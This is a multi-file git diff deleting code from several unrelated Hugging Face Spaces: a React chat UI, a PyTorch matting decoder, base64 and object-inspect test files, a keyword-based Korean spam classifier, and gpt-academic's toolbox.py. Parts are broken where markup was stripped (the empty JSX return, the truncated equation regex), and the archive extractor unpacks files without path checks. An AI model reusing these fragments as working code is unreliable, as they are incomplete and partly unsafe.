      \ No newline at end of file diff --git a/spaces/fffffu/bing/src/components/chat.tsx b/spaces/fffffu/bing/src/components/chat.tsx deleted file mode 100644 index a37ab1cc96ca2e6bfd9acbe313a8d946bfd5c3d4..0000000000000000000000000000000000000000 --- a/spaces/fffffu/bing/src/components/chat.tsx +++ /dev/null @@ -1,93 +0,0 @@ -'use client' - -import { useCallback, useEffect, useMemo, useState } from 'react' -import { useAtom } from 'jotai' -import Image from 'next/image' -import { cn } from '@/lib/utils' -import { ChatList } from '@/components/chat-list' -import { ChatPanel } from '@/components/chat-panel' -import { WelcomeScreen } from '@/components/welcome-screen' -import { ChatScrollAnchor } from '@/components/chat-scroll-anchor' -import { ToneSelector } from './tone-selector' -import { ChatHeader } from './chat-header' -import { ChatSuggestions } from './chat-suggestions' -import { bingConversationStyleAtom } from '@/state' -import { ButtonScrollToBottom } from '@/components/button-scroll-to-bottom' -import StopIcon from '@/assets/images/stop.svg' -import { useBing } from '@/lib/hooks/use-bing' -import { ChatMessageModel } from '@/lib/bots/bing/types' -import { ChatNotification } from './chat-notification' -import { Settings } from './settings' -import { ChatHistory } from './chat-history' - -export type ChatProps = React.ComponentProps<'div'> & { initialMessages?: ChatMessageModel[] } - -export default function Chat({ className }: ChatProps) { - - const [bingStyle, setBingStyle] = useAtom(bingConversationStyleAtom) - const { - messages, - sendMessage, - resetConversation, - stopGenerating, - setInput, - bot, - input, - generating, - isSpeaking, - uploadImage, - attachmentList, - setAttachmentList, - } = useBing() - - useEffect(() => { - window.scrollTo({ - top: document.body.offsetHeight, - behavior: 'smooth' - }) - }, []) - - return ( -
      - -
      - - - - {messages.length ? ( - <> - - - - - - {generating ? ( -
      - -
      - ) : null} - - ) : null} -
      - - -
      - ) -} diff --git a/spaces/fffiloni/Video-Matting-Anything/networks/m2ms/conv_sam.py b/spaces/fffiloni/Video-Matting-Anything/networks/m2ms/conv_sam.py deleted file mode 100644 index 8a5720c8c03daa9714e025e4cf7730d327557d48..0000000000000000000000000000000000000000 --- a/spaces/fffiloni/Video-Matting-Anything/networks/m2ms/conv_sam.py +++ /dev/null @@ -1,189 +0,0 @@ -import logging -import torch.nn as nn -import torch -import torch.nn.functional as F -from networks import ops - -def conv5x5(in_planes, out_planes, stride=1, groups=1, dilation=1): - """5x5 convolution with padding""" - return nn.Conv2d(in_planes, out_planes, kernel_size=5, stride=stride, - padding=2, groups=groups, bias=False, dilation=dilation) - - -def conv3x3(in_planes, out_planes, stride=1, groups=1, dilation=1): - """3x3 convolution with padding""" - return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride, - padding=dilation, groups=groups, bias=False, dilation=dilation) - - -def conv1x1(in_planes, out_planes, stride=1): - """1x1 convolution""" - return nn.Conv2d(in_planes, out_planes, kernel_size=1, stride=stride, bias=False) - - -class BasicBlock(nn.Module): - expansion = 1 - - def __init__(self, inplanes, planes, stride=1, upsample=None, norm_layer=None, large_kernel=False): - super(BasicBlock, self).__init__() - if norm_layer is None: - norm_layer = nn.BatchNorm2d - self.stride = stride - conv = conv5x5 if large_kernel else conv3x3 - # Both self.conv1 and self.downsample layers downsample the input when stride != 1 - if self.stride > 1: - self.conv1 = ops.SpectralNorm(nn.ConvTranspose2d(inplanes, inplanes, kernel_size=4, stride=2, padding=1, bias=False)) - else: - self.conv1 = ops.SpectralNorm(conv(inplanes, inplanes)) - self.bn1 = norm_layer(inplanes) - self.activation = nn.LeakyReLU(0.2, inplace=True) - self.conv2 = ops.SpectralNorm(conv(inplanes, planes)) - self.bn2 = norm_layer(planes) - self.upsample = upsample - - def forward(self, x): - identity = x - - out = self.conv1(x) - out = self.bn1(out) - out = self.activation(out) - - out = self.conv2(out) - out = self.bn2(out) - - if self.upsample is not None: - identity = self.upsample(x) - - out += identity - out = self.activation(out) - - return out - -class SAM_Decoder_Deep(nn.Module): - def __init__(self, nc, layers, block=BasicBlock, norm_layer=None, large_kernel=False, late_downsample=False): - super(SAM_Decoder_Deep, self).__init__() - self.logger = logging.getLogger("Logger") - if norm_layer is None: - norm_layer = nn.BatchNorm2d - self._norm_layer = norm_layer - self.large_kernel = large_kernel - self.kernel_size = 5 if self.large_kernel else 3 - - #self.inplanes = 512 if layers[0] > 0 else 256 - self.inplanes = 256 - self.late_downsample = late_downsample - self.midplanes = 64 if late_downsample else 32 - - self.conv1 = ops.SpectralNorm(nn.ConvTranspose2d(self.midplanes, 32, kernel_size=4, stride=2, padding=1, bias=False)) - self.bn1 = norm_layer(32) - self.leaky_relu = nn.LeakyReLU(0.2, inplace=True) - - self.upsample = nn.UpsamplingNearest2d(scale_factor=2) - self.tanh = nn.Tanh() - #self.layer1 = self._make_layer(block, 256, layers[0], stride=2) - self.layer2 = self._make_layer(block, 128, layers[1], stride=2) - self.layer3 = self._make_layer(block, 64, layers[2], stride=2) - self.layer4 = self._make_layer(block, self.midplanes, layers[3], stride=2) - - self.refine_OS1 = nn.Sequential( - nn.Conv2d(32, 32, kernel_size=self.kernel_size, stride=1, padding=self.kernel_size//2, bias=False), - norm_layer(32), - self.leaky_relu, - nn.Conv2d(32, 1, kernel_size=self.kernel_size, stride=1, padding=self.kernel_size//2),) - - self.refine_OS4 = nn.Sequential( - nn.Conv2d(64, 32, kernel_size=self.kernel_size, stride=1, padding=self.kernel_size//2, bias=False), - norm_layer(32), - self.leaky_relu, - nn.Conv2d(32, 1, kernel_size=self.kernel_size, stride=1, padding=self.kernel_size//2),) - - self.refine_OS8 = nn.Sequential( - nn.Conv2d(128, 32, kernel_size=self.kernel_size, stride=1, padding=self.kernel_size//2, bias=False), - norm_layer(32), - self.leaky_relu, - nn.Conv2d(32, 1, kernel_size=self.kernel_size, stride=1, padding=self.kernel_size//2),) - - for m in self.modules(): - if isinstance(m, nn.Conv2d): - if hasattr(m, "weight_bar"): - nn.init.xavier_uniform_(m.weight_bar) - else: - nn.init.xavier_uniform_(m.weight) - elif isinstance(m, (nn.BatchNorm2d, nn.GroupNorm)): - nn.init.constant_(m.weight, 1) - nn.init.constant_(m.bias, 0) - - # Zero-initialize the last BN in each residual branch, - # so that the residual branch starts with zeros, and each residual block behaves like an identity. - # This improves the model by 0.2~0.3% according to https://arxiv.org/abs/1706.02677 - for m in self.modules(): - if isinstance(m, BasicBlock): - nn.init.constant_(m.bn2.weight, 0) - - self.logger.debug(self) - - def _make_layer(self, block, planes, blocks, stride=1): - if blocks == 0: - return nn.Sequential(nn.Identity()) - norm_layer = self._norm_layer - upsample = None - if stride != 1: - upsample = nn.Sequential( - nn.UpsamplingNearest2d(scale_factor=2), - ops.SpectralNorm(conv1x1(self.inplanes + 4, planes * block.expansion)), - norm_layer(planes * block.expansion), - ) - elif self.inplanes != planes * block.expansion: - upsample = nn.Sequential( - ops.SpectralNorm(conv1x1(self.inplanes + 4, planes * block.expansion)), - norm_layer(planes * block.expansion), - ) - - layers = [block(self.inplanes + 4, planes, stride, upsample, norm_layer, self.large_kernel)] - self.inplanes = planes * block.expansion - for _ in range(1, blocks): - layers.append(block(self.inplanes, planes, norm_layer=norm_layer, large_kernel=self.large_kernel)) - - return nn.Sequential(*layers) - - def forward(self, x_os16, img, mask): - ret = {} - mask_os16 = F.interpolate(mask, x_os16.shape[2:], mode='bilinear', align_corners=False) - img_os16 = F.interpolate(img, x_os16.shape[2:], mode='bilinear', align_corners=False) - - x = self.layer2(torch.cat((x_os16, img_os16, mask_os16), dim=1)) # N x 128 x 128 x 128 - - x_os8 = self.refine_OS8(x) - - mask_os8 = F.interpolate(mask, x.shape[2:], mode='bilinear', align_corners=False) - img_os8 = F.interpolate(img, x.shape[2:], mode='bilinear', align_corners=False) - - x = self.layer3(torch.cat((x, img_os8, mask_os8), dim=1)) # N x 64 x 256 x 256 - - x_os4 = self.refine_OS4(x) - - mask_os4 = F.interpolate(mask, x.shape[2:], mode='bilinear', align_corners=False) - img_os4 = F.interpolate(img, x.shape[2:], mode='bilinear', align_corners=False) - - x = self.layer4(torch.cat((x, img_os4, mask_os4), dim=1)) # N x 32 x 512 x 512 - x = self.conv1(x) - x = self.bn1(x) - x = self.leaky_relu(x) # N x 32 x 1024 x 1024 - - x_os1 = self.refine_OS1(x) # N - - x_os4 = F.interpolate(x_os4, scale_factor=4.0, mode='bilinear', align_corners=False) - x_os8 = F.interpolate(x_os8, scale_factor=8.0, mode='bilinear', align_corners=False) - - x_os1 = (torch.tanh(x_os1) + 1.0) / 2.0 - x_os4 = (torch.tanh(x_os4) + 1.0) / 2.0 - x_os8 = (torch.tanh(x_os8) + 1.0) / 2.0 - - mask_os1 = F.interpolate(mask, x_os1.shape[2:], mode='bilinear', align_corners=False) - - ret['alpha_os1'] = x_os1 - ret['alpha_os4'] = x_os4 - ret['alpha_os8'] = x_os8 - ret['mask'] = mask_os1 - - return ret \ No newline at end of file diff --git a/spaces/fffiloni/controlnet-animation-doodle/node_modules/engine.io-parser/build/esm/contrib/base64-arraybuffer.js b/spaces/fffiloni/controlnet-animation-doodle/node_modules/engine.io-parser/build/esm/contrib/base64-arraybuffer.js deleted file mode 100644 index b54438472351942e375e3698b2a78ba8ca9260e0..0000000000000000000000000000000000000000 --- a/spaces/fffiloni/controlnet-animation-doodle/node_modules/engine.io-parser/build/esm/contrib/base64-arraybuffer.js +++ /dev/null @@ -1,43 +0,0 @@ -// imported from https://github.com/socketio/base64-arraybuffer -const chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'; -// Use a lookup table to find the index. -const lookup = typeof Uint8Array === 'undefined' ? [] : new Uint8Array(256); -for (let i = 0; i < chars.length; i++) { - lookup[chars.charCodeAt(i)] = i; -} -export const encode = (arraybuffer) => { - let bytes = new Uint8Array(arraybuffer), i, len = bytes.length, base64 = ''; - for (i = 0; i < len; i += 3) { - base64 += chars[bytes[i] >> 2]; - base64 += chars[((bytes[i] & 3) << 4) | (bytes[i + 1] >> 4)]; - base64 += chars[((bytes[i + 1] & 15) << 2) | (bytes[i + 2] >> 6)]; - base64 += chars[bytes[i + 2] & 63]; - } - if (len % 3 === 2) { - base64 = base64.substring(0, base64.length - 1) + '='; - } - else if (len % 3 === 1) { - base64 = base64.substring(0, base64.length - 2) + '=='; - } - return base64; -}; -export const decode = (base64) => { - let bufferLength = base64.length * 0.75, len = base64.length, i, p = 0, encoded1, encoded2, encoded3, encoded4; - if (base64[base64.length - 1] === '=') { - bufferLength--; - if (base64[base64.length - 2] === '=') { - bufferLength--; - } - } - const arraybuffer = new ArrayBuffer(bufferLength), bytes = new Uint8Array(arraybuffer); - for (i = 0; i < len; i += 4) { - encoded1 = lookup[base64.charCodeAt(i)]; - encoded2 = lookup[base64.charCodeAt(i + 1)]; - encoded3 = lookup[base64.charCodeAt(i + 2)]; - encoded4 = lookup[base64.charCodeAt(i + 3)]; - bytes[p++] = (encoded1 << 2) | (encoded2 >> 4); - bytes[p++] = ((encoded2 & 15) << 4) | (encoded3 >> 2); - bytes[p++] = ((encoded3 & 3) << 6) | (encoded4 & 63); - } - return arraybuffer; -}; diff --git a/spaces/fffiloni/controlnet-animation-doodle/node_modules/object-inspect/test/indent-option.js b/spaces/fffiloni/controlnet-animation-doodle/node_modules/object-inspect/test/indent-option.js deleted file mode 100644 index 89d8fcedfa318ca67c9ba8fe694ba06fd2b47044..0000000000000000000000000000000000000000 --- a/spaces/fffiloni/controlnet-animation-doodle/node_modules/object-inspect/test/indent-option.js +++ /dev/null @@ -1,271 +0,0 @@ -var test = require('tape'); -var forEach = require('for-each'); - -var inspect = require('../'); - -test('bad indent options', function (t) { - forEach([ - undefined, - true, - false, - -1, - 1.2, - Infinity, - -Infinity, - NaN - ], function (indent) { - t['throws']( - function () { inspect('', { indent: indent }); }, - TypeError, - inspect(indent) + ' is invalid' - ); - }); - - t.end(); -}); - -test('simple object with indent', function (t) { - t.plan(2); - - var obj = { a: 1, b: 2 }; - - var expectedSpaces = [ - '{', - ' a: 1,', - ' b: 2', - '}' - ].join('\n'); - var expectedTabs = [ - '{', - ' a: 1,', - ' b: 2', - '}' - ].join('\n'); - - t.equal(inspect(obj, { indent: 2 }), expectedSpaces, 'two'); - t.equal(inspect(obj, { indent: '\t' }), expectedTabs, 'tabs'); -}); - -test('two deep object with indent', function (t) { - t.plan(2); - - var obj = { a: 1, b: { c: 3, d: 4 } }; - - var expectedSpaces = [ - '{', - ' a: 1,', - ' b: {', - ' c: 3,', - ' d: 4', - ' }', - '}' - ].join('\n'); - var expectedTabs = [ - '{', - ' a: 1,', - ' b: {', - ' c: 3,', - ' d: 4', - ' }', - '}' - ].join('\n'); - - t.equal(inspect(obj, { indent: 2 }), expectedSpaces, 'two'); - t.equal(inspect(obj, { indent: '\t' }), expectedTabs, 'tabs'); -}); - -test('simple array with all single line elements', function (t) { - t.plan(2); - - var obj = [1, 2, 3, 'asdf\nsdf']; - - var expected = '[ 1, 2, 3, \'asdf\\nsdf\' ]'; - - t.equal(inspect(obj, { indent: 2 }), expected, 'two'); - t.equal(inspect(obj, { indent: '\t' }), expected, 'tabs'); -}); - -test('array with complex elements', function (t) { - t.plan(2); - - var obj = [1, { a: 1, b: { c: 1 } }, 'asdf\nsdf']; - - var expectedSpaces = [ - '[', - ' 1,', - ' {', - ' a: 1,', - ' b: {', - ' c: 1', - ' }', - ' },', - ' \'asdf\\nsdf\'', - ']' - ].join('\n'); - var expectedTabs = [ - '[', - ' 1,', - ' {', - ' a: 1,', - ' b: {', - ' c: 1', - ' }', - ' },', - ' \'asdf\\nsdf\'', - ']' - ].join('\n'); - - t.equal(inspect(obj, { indent: 2 }), expectedSpaces, 'two'); - t.equal(inspect(obj, { indent: '\t' }), expectedTabs, 'tabs'); -}); - -test('values', function (t) { - t.plan(2); - var obj = [{}, [], { 'a-b': 5 }]; - - var expectedSpaces = [ - '[', - ' {},', - ' [],', - ' {', - ' \'a-b\': 5', - ' }', - ']' - ].join('\n'); - var expectedTabs = [ - '[', - ' {},', - ' [],', - ' {', - ' \'a-b\': 5', - ' }', - ']' - ].join('\n'); - - t.equal(inspect(obj, { indent: 2 }), expectedSpaces, 'two'); - t.equal(inspect(obj, { indent: '\t' }), expectedTabs, 'tabs'); -}); - -test('Map', { skip: typeof Map !== 'function' }, function (t) { - var map = new Map(); - map.set({ a: 1 }, ['b']); - map.set(3, NaN); - - var expectedStringSpaces = [ - 'Map (2) {', - ' { a: 1 } => [ \'b\' ],', - ' 3 => NaN', - '}' - ].join('\n'); - var expectedStringTabs = [ - 'Map (2) {', - ' { a: 1 } => [ \'b\' ],', - ' 3 => NaN', - '}' - ].join('\n'); - var expectedStringTabsDoubleQuotes = [ - 'Map (2) {', - ' { a: 1 } => [ "b" ],', - ' 3 => NaN', - '}' - ].join('\n'); - - t.equal( - inspect(map, { indent: 2 }), - expectedStringSpaces, - 'Map keys are not indented (two)' - ); - t.equal( - inspect(map, { indent: '\t' }), - expectedStringTabs, - 'Map keys are not indented (tabs)' - ); - t.equal( - inspect(map, { indent: '\t', quoteStyle: 'double' }), - expectedStringTabsDoubleQuotes, - 'Map keys are not indented (tabs + double quotes)' - ); - - t.equal(inspect(new Map(), { indent: 2 }), 'Map (0) {}', 'empty Map should show as empty (two)'); - t.equal(inspect(new Map(), { indent: '\t' }), 'Map (0) {}', 'empty Map should show as empty (tabs)'); - - var nestedMap = new Map(); - nestedMap.set(nestedMap, map); - var expectedNestedSpaces = [ - 'Map (1) {', - ' [Circular] => Map (2) {', - ' { a: 1 } => [ \'b\' ],', - ' 3 => NaN', - ' }', - '}' - ].join('\n'); - var expectedNestedTabs = [ - 'Map (1) {', - ' [Circular] => Map (2) {', - ' { a: 1 } => [ \'b\' ],', - ' 3 => NaN', - ' }', - '}' - ].join('\n'); - t.equal(inspect(nestedMap, { indent: 2 }), expectedNestedSpaces, 'Map containing a Map should work (two)'); - t.equal(inspect(nestedMap, { indent: '\t' }), expectedNestedTabs, 'Map containing a Map should work (tabs)'); - - t.end(); -}); - -test('Set', { skip: typeof Set !== 'function' }, function (t) { - var set = new Set(); - set.add({ a: 1 }); - set.add(['b']); - var expectedStringSpaces = [ - 'Set (2) {', - ' {', - ' a: 1', - ' },', - ' [ \'b\' ]', - '}' - ].join('\n'); - var expectedStringTabs = [ - 'Set (2) {', - ' {', - ' a: 1', - ' },', - ' [ \'b\' ]', - '}' - ].join('\n'); - t.equal(inspect(set, { indent: 2 }), expectedStringSpaces, 'new Set([{ a: 1 }, ["b"]]) should show size and contents (two)'); - t.equal(inspect(set, { indent: '\t' }), expectedStringTabs, 'new Set([{ a: 1 }, ["b"]]) should show size and contents (tabs)'); - - t.equal(inspect(new Set(), { indent: 2 }), 'Set (0) {}', 'empty Set should show as empty (two)'); - t.equal(inspect(new Set(), { indent: '\t' }), 'Set (0) {}', 'empty Set should show as empty (tabs)'); - - var nestedSet = new Set(); - nestedSet.add(set); - nestedSet.add(nestedSet); - var expectedNestedSpaces = [ - 'Set (2) {', - ' Set (2) {', - ' {', - ' a: 1', - ' },', - ' [ \'b\' ]', - ' },', - ' [Circular]', - '}' - ].join('\n'); - var expectedNestedTabs = [ - 'Set (2) {', - ' Set (2) {', - ' {', - ' a: 1', - ' },', - ' [ \'b\' ]', - ' },', - ' [Circular]', - '}' - ].join('\n'); - t.equal(inspect(nestedSet, { indent: 2 }), expectedNestedSpaces, 'Set containing a Set should work (two)'); - t.equal(inspect(nestedSet, { indent: '\t' }), expectedNestedTabs, 'Set containing a Set should work (tabs)'); - - t.end(); -}); diff --git a/spaces/fgenie/scamtext_PAL_self_consistency/funcs/f_34.py b/spaces/fgenie/scamtext_PAL_self_consistency/funcs/f_34.py deleted file mode 100644 index 7be43be79a3c610bd6080df7b021cb8d86f0f486..0000000000000000000000000000000000000000 --- a/spaces/fgenie/scamtext_PAL_self_consistency/funcs/f_34.py +++ /dev/null @@ -1,15 +0,0 @@ - -import re - -def is_spam(text: str) -> bool: - spam_keywords = ['상한가', '추친중', '무료체험', '수익보장', '정보입수', '출발', '마감', '무료거부', '코드', '체험반', '초대', '실력입증', '알려드린', '카카오톡제재'] - suspicious_url_pattern = r'(https?://[^\s]+)' - suspicious_url_pattern2 = r'(han.gl/[^\s]+)' - - found_keyword = any(word in text for word in spam_keywords) - found_suspicious_url = re.search(suspicious_url_pattern, text) or re.search(suspicious_url_pattern2, text) - - if found_keyword or found_suspicious_url: - return True - - return False diff --git a/spaces/fkhuggingme/gpt-academic/toolbox.py b/spaces/fkhuggingme/gpt-academic/toolbox.py deleted file mode 100644 index 5e42164d2bd26f6d8fcba54cb8d8238cdc7c9285..0000000000000000000000000000000000000000 --- a/spaces/fkhuggingme/gpt-academic/toolbox.py +++ /dev/null @@ -1,657 +0,0 @@ -import markdown -import importlib -import traceback -import inspect -import re -from latex2mathml.converter import convert as tex2mathml -from functools import wraps, lru_cache - -""" -======================================================================== -第一部分 -函数插件输入输出接驳区 - - ChatBotWithCookies: 带Cookies的Chatbot类,为实现更多强大的功能做基础 - - ArgsGeneralWrapper: 装饰器函数,用于重组输入参数,改变输入参数的顺序与结构 - - update_ui: 刷新界面用 yield from update_ui(chatbot, history) - - CatchException: 将插件中出的所有问题显示在界面上 - - HotReload: 实现插件的热更新 - - trimmed_format_exc: 打印traceback,为了安全而隐藏绝对地址 -======================================================================== -""" - -class ChatBotWithCookies(list): - def __init__(self, cookie): - self._cookies = cookie - - def write_list(self, list): - for t in list: - self.append(t) - - def get_list(self): - return [t for t in self] - - def get_cookies(self): - return self._cookies - - -def ArgsGeneralWrapper(f): - """ - 装饰器函数,用于重组输入参数,改变输入参数的顺序与结构。 - """ - def decorated(cookies, max_length, llm_model, txt, txt2, top_p, temperature, chatbot, history, system_prompt, plugin_advanced_arg, *args): - txt_passon = txt - if txt == "" and txt2 != "": txt_passon = txt2 - # 引入一个有cookie的chatbot - cookies.update({ - 'top_p':top_p, - 'temperature':temperature, - }) - llm_kwargs = { - 'api_key': cookies['api_key'], - 'llm_model': llm_model, - 'top_p':top_p, - 'max_length': max_length, - 'temperature':temperature, - } - plugin_kwargs = { - "advanced_arg": plugin_advanced_arg, - } - chatbot_with_cookie = ChatBotWithCookies(cookies) - chatbot_with_cookie.write_list(chatbot) - yield from f(txt_passon, llm_kwargs, plugin_kwargs, chatbot_with_cookie, history, system_prompt, *args) - return decorated - - -def update_ui(chatbot, history, msg='正常', **kwargs): # 刷新界面 - """ - 刷新用户界面 - """ - assert isinstance(chatbot, ChatBotWithCookies), "在传递chatbot的过程中不要将其丢弃。必要时,可用clear将其清空,然后用for+append循环重新赋值。" - yield chatbot.get_cookies(), chatbot, history, msg - -def trimmed_format_exc(): - import os, traceback - str = traceback.format_exc() - current_path = os.getcwd() - replace_path = "." - return str.replace(current_path, replace_path) - -def CatchException(f): - """ - 装饰器函数,捕捉函数f中的异常并封装到一个生成器中返回,并显示到聊天当中。 - """ - - @wraps(f) - def decorated(txt, top_p, temperature, chatbot, history, systemPromptTxt, WEB_PORT): - try: - yield from f(txt, top_p, temperature, chatbot, history, systemPromptTxt, WEB_PORT) - except Exception as e: - from check_proxy import check_proxy - from toolbox import get_conf - proxies, = get_conf('proxies') - tb_str = '```\n' + trimmed_format_exc() + '```' - if len(chatbot) == 0: - chatbot.clear() - chatbot.append(["插件调度异常", "异常原因"]) - chatbot[-1] = (chatbot[-1][0], - f"[Local Message] 实验性函数调用出错: \n\n{tb_str} \n\n当前代理可用性: \n\n{check_proxy(proxies)}") - yield from update_ui(chatbot=chatbot, history=history, msg=f'异常 {e}') # 刷新界面 - return decorated - - -def HotReload(f): - """ - HotReload的装饰器函数,用于实现Python函数插件的热更新。 - 函数热更新是指在不停止程序运行的情况下,更新函数代码,从而达到实时更新功能。 - 在装饰器内部,使用wraps(f)来保留函数的元信息,并定义了一个名为decorated的内部函数。 - 内部函数通过使用importlib模块的reload函数和inspect模块的getmodule函数来重新加载并获取函数模块, - 然后通过getattr函数获取函数名,并在新模块中重新加载函数。 - 最后,使用yield from语句返回重新加载过的函数,并在被装饰的函数上执行。 - 最终,装饰器函数返回内部函数。这个内部函数可以将函数的原始定义更新为最新版本,并执行函数的新版本。 - """ - @wraps(f) - def decorated(*args, **kwargs): - fn_name = f.__name__ - f_hot_reload = getattr(importlib.reload(inspect.getmodule(f)), fn_name) - yield from f_hot_reload(*args, **kwargs) - return decorated - - -""" -======================================================================== -第二部分 -其他小工具: - - write_results_to_file: 将结果写入markdown文件中 - - regular_txt_to_markdown: 将普通文本转换为Markdown格式的文本。 - - report_execption: 向chatbot中添加简单的意外错误信息 - - text_divide_paragraph: 将文本按照段落分隔符分割开,生成带有段落标签的HTML代码。 - - markdown_convertion: 用多种方式组合,将markdown转化为好看的html - - format_io: 接管gradio默认的markdown处理方式 - - on_file_uploaded: 处理文件的上传(自动解压) - - on_report_generated: 将生成的报告自动投射到文件上传区 - - clip_history: 当历史上下文过长时,自动截断 - - get_conf: 获取设置 - - select_api_key: 根据当前的模型类别,抽取可用的api-key -======================================================================== -""" - -def get_reduce_token_percent(text): - """ - * 此函数未来将被弃用 - """ - try: - # text = "maximum context length is 4097 tokens. However, your messages resulted in 4870 tokens" - pattern = r"(\d+)\s+tokens\b" - match = re.findall(pattern, text) - EXCEED_ALLO = 500 # 稍微留一点余地,否则在回复时会因余量太少出问题 - max_limit = float(match[0]) - EXCEED_ALLO - current_tokens = float(match[1]) - ratio = max_limit/current_tokens - assert ratio > 0 and ratio < 1 - return ratio, str(int(current_tokens-max_limit)) - except: - return 0.5, '不详' - - -def write_results_to_file(history, file_name=None): - """ - 将对话记录history以Markdown格式写入文件中。如果没有指定文件名,则使用当前时间生成文件名。 - """ - import os - import time - if file_name is None: - # file_name = time.strftime("chatGPT分析报告%Y-%m-%d-%H-%M-%S", time.localtime()) + '.md' - file_name = 'chatGPT分析报告' + \ - time.strftime("%Y-%m-%d-%H-%M-%S", time.localtime()) + '.md' - os.makedirs('./gpt_log/', exist_ok=True) - with open(f'./gpt_log/{file_name}', 'w', encoding='utf8') as f: - f.write('# chatGPT 分析报告\n') - for i, content in enumerate(history): - try: # 这个bug没找到触发条件,暂时先这样顶一下 - if type(content) != str: - content = str(content) - except: - continue - if i % 2 == 0: - f.write('## ') - f.write(content) - f.write('\n\n') - res = '以上材料已经被写入' + os.path.abspath(f'./gpt_log/{file_name}') - print(res) - return res - - -def regular_txt_to_markdown(text): - """ - 将普通文本转换为Markdown格式的文本。 - """ - text = text.replace('\n', '\n\n') - text = text.replace('\n\n\n', '\n\n') - text = text.replace('\n\n\n', '\n\n') - return text - - - - -def report_execption(chatbot, history, a, b): - """ - 向chatbot中添加错误信息 - """ - chatbot.append((a, b)) - history.append(a) - history.append(b) - - -def text_divide_paragraph(text): - """ - 将文本按照段落分隔符分割开,生成带有段落标签的HTML代码。 - """ - if '```' in text: - # careful input - return text - else: - # wtf input - lines = text.split("\n") - for i, line in enumerate(lines): - lines[i] = lines[i].replace(" ", " ") - text = "
      ".join(lines) - return text - -@lru_cache(maxsize=128) # 使用 lru缓存 加快转换速度 -def markdown_convertion(txt): - """ - 将Markdown格式的文本转换为HTML格式。如果包含数学公式,则先将公式转换为HTML格式。 - """ - pre = '
      ' - suf = '
      ' - if txt.startswith(pre) and txt.endswith(suf): - # print('警告,输入了已经经过转化的字符串,二次转化可能出问题') - return txt # 已经被转化过,不需要再次转化 - - markdown_extension_configs = { - 'mdx_math': { - 'enable_dollar_delimiter': True, - 'use_gitlab_delimiters': False, - }, - } - find_equation_pattern = r'\n', '') - return content - - def no_code(txt): - if '```' not in txt: - return True - else: - if '```reference' in txt: return True # newbing - else: return False - - if ('$' in txt) and no_code(txt): # 有$标识的公式符号,且没有代码段```的标识 - # convert everything to html format - split = markdown.markdown(text='---') - convert_stage_1 = markdown.markdown(text=txt, extensions=['mdx_math', 'fenced_code', 'tables', 'sane_lists'], extension_configs=markdown_extension_configs) - convert_stage_1 = markdown_bug_hunt(convert_stage_1) - # re.DOTALL: Make the '.' special character match any character at all, including a newline; without this flag, '.' will match anything except a newline. Corresponds to the inline flag (?s). - # 1. convert to easy-to-copy tex (do not render math) - convert_stage_2_1, n = re.subn(find_equation_pattern, replace_math_no_render, convert_stage_1, flags=re.DOTALL) - # 2. convert to rendered equation - convert_stage_2_2, n = re.subn(find_equation_pattern, replace_math_render, convert_stage_1, flags=re.DOTALL) - # cat them together - return pre + convert_stage_2_1 + f'{split}' + convert_stage_2_2 + suf - else: - return pre + markdown.markdown(txt, extensions=['fenced_code', 'codehilite', 'tables', 'sane_lists']) + suf - - -def close_up_code_segment_during_stream(gpt_reply): - """ - 在gpt输出代码的中途(输出了前面的```,但还没输出完后面的```),补上后面的``` - - Args: - gpt_reply (str): GPT模型返回的回复字符串。 - - Returns: - str: 返回一个新的字符串,将输出代码片段的“后面的```”补上。 - - """ - if '```' not in gpt_reply: - return gpt_reply - if gpt_reply.endswith('```'): - return gpt_reply - - # 排除了以上两个情况,我们 - segments = gpt_reply.split('```') - n_mark = len(segments) - 1 - if n_mark % 2 == 1: - # print('输出代码片段中!') - return gpt_reply+'\n```' - else: - return gpt_reply - - -def format_io(self, y): - """ - 将输入和输出解析为HTML格式。将y中最后一项的输入部分段落化,并将输出部分的Markdown和数学公式转换为HTML格式。 - """ - if y is None or y == []: - return [] - i_ask, gpt_reply = y[-1] - i_ask = text_divide_paragraph(i_ask) # 输入部分太自由,预处理一波 - gpt_reply = close_up_code_segment_during_stream(gpt_reply) # 当代码输出半截的时候,试着补上后个``` - y[-1] = ( - None if i_ask is None else markdown.markdown(i_ask, extensions=['fenced_code', 'tables']), - None if gpt_reply is None else markdown_convertion(gpt_reply) - ) - return y - - -def find_free_port(): - """ - 返回当前系统中可用的未使用端口。 - """ - import socket - from contextlib import closing - with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s: - s.bind(('', 0)) - s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) - return s.getsockname()[1] - - -def extract_archive(file_path, dest_dir): - import zipfile - import tarfile - import os - # Get the file extension of the input file - file_extension = os.path.splitext(file_path)[1] - - # Extract the archive based on its extension - if file_extension == '.zip': - with zipfile.ZipFile(file_path, 'r') as zipobj: - zipobj.extractall(path=dest_dir) - print("Successfully extracted zip archive to {}".format(dest_dir)) - - elif file_extension in ['.tar', '.gz', '.bz2']: - with tarfile.open(file_path, 'r:*') as tarobj: - tarobj.extractall(path=dest_dir) - print("Successfully extracted tar archive to {}".format(dest_dir)) - - # 第三方库,需要预先pip install rarfile - # 此外,Windows上还需要安装winrar软件,配置其Path环境变量,如"C:\Program Files\WinRAR"才可以 - elif file_extension == '.rar': - try: - import rarfile - with rarfile.RarFile(file_path) as rf: - rf.extractall(path=dest_dir) - print("Successfully extracted rar archive to {}".format(dest_dir)) - except: - print("Rar format requires additional dependencies to install") - return '\n\n需要安装pip install rarfile来解压rar文件' - - # 第三方库,需要预先pip install py7zr - elif file_extension == '.7z': - try: - import py7zr - with py7zr.SevenZipFile(file_path, mode='r') as f: - f.extractall(path=dest_dir) - print("Successfully extracted 7z archive to {}".format(dest_dir)) - except: - print("7z format requires additional dependencies to install") - return '\n\n需要安装pip install py7zr来解压7z文件' - else: - return '' - return '' - - -def find_recent_files(directory): - """ - me: find files that is created with in one minutes under a directory with python, write a function - gpt: here it is! - """ - import os - import time - current_time = time.time() - one_minute_ago = current_time - 60 - recent_files = [] - - for filename in os.listdir(directory): - file_path = os.path.join(directory, filename) - if file_path.endswith('.log'): - continue - created_time = os.path.getmtime(file_path) - if created_time >= one_minute_ago: - if os.path.isdir(file_path): - continue - recent_files.append(file_path) - - return recent_files - - -def on_file_uploaded(files, chatbot, txt, txt2, checkboxes): - """ - 当文件被上传时的回调函数 - """ - if len(files) == 0: - return chatbot, txt - import shutil - import os - import time 